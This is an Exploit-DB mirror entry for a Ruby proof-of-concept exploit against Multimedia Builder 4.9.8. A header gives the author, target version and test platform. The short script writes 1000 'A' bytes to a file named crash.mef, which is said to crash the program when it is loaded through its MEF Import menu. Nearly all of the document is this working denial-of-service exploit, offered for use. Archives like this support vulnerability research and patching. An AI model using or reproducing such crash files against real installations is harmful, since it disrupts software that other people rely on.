exploit-db-mirror/exploits/windows/dos/18879.rb
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

23 lines
No EOL
1.1 KiB
Ruby
Executable file

Multimedia Builder 4.9.8 Malicious mef File Denial of service
===================================================================================
# Exploit Title:Multimedia Builder 4.9.8 Malicious mef File Denial of service
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# Website: www.infosec4all.tk
# version: 4.9.8
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC####################################################
#Multimedia Builder 4.9.8 Malicious mef File Denial of service vulnerability ,when opening a #
#malicious .mef file. #
#To trigger the exploit , go to file->MEF Import ->load MEF # #
################################################################################################
#!/usr/bin/ruby
File.open "crash.mef" , "w" do |file|
crash = "\x41" * 1000
file.write crash
end